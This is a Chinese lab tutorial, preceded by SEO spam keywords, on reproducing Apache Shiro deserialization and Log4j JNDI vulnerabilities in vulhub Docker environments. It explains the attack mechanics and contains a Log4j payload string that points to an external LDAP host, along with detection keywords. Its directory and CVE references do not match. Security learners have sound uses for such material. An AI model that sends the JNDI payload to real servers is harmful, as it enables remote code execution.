清远建设网站,网站内容百度不收录,湖北网站建设公司哪家好,手机响应式网站开发文章目录 安装环境shiro漏洞验证log4j 安装环境
进入vulhb目录下的weblogic#xff0c;复现CVE-2018-2894漏洞#xff1a;
cd /vulhub/shiro/CVE-2010-3863查看docker-compose的配置文件#xff1a;
cat docker-compose.yml如图#xff0c;里面有一个镜像文件的信息和服… 文章目录 安装环境shiro漏洞验证log4j 安装环境
进入vulhb目录下的weblogic复现CVE-2018-2894漏洞
cd /vulhub/shiro/CVE-2010-3863查看docker-compose的配置文件
cat docker-compose.yml如图里面有一个镜像文件的信息和服务名以及它的端口号后面要用 然后使用下面命令搭建docker-compose并启动
sudo docker-compose up -d sudo docker-compose up -d如图安装成功
shiro漏洞验证
原理如下 Apache Shiro框架提供了记住我的功能RememberMe用户登陆成功后会生成经过加密并编码的cookie在服务端接收cookie值后Base64解码–AES解密–反序列化。攻击者只要找到AES加密的密钥就可以构造一个恶意对象对其进行序列化–AES加密–Base64编码然后将其作为cookie的rememberMe字段发送Shiro将rememberMe进行解密并且反序列化最终造成反序列化漏洞。 用bp自带的浏览器打开http://10.9.75.45:8080/随意输入用户名密码并勾选记住我
点击登录后抓包发送到repeat模块发现请求包中有rememberme字段 点击send发送响应包中有set-cookie字段并有rememberMedeleteMe内容这是一个shiro反序列化漏洞的强特征说明有极大的可能存在shiro反序列化 log4j log4jlog for Java是Apache的一个开源项目是一个基于Java的日志记录框架。该漏洞的主要原因是log4j在日志输出中未对字符合法性进行严格的限制执行了JNDI协议加载的远程恶意脚本从而造成RCE。 它是一个RCE命令执行的漏洞,它的日志的输出如下print函数双引号中的内容会被当做字符处理
$user$_GET(user);
log.print(“用户$user登录失败”);如果print函数中出现如${jndi:ldap://lof4ot.dnslog.cn/exp}的内容就会将大括号中的内容当做命令执行
如果流量中遇到下面三个关键字极大可能是Java的漏洞攻击 rmi、jndi、ldap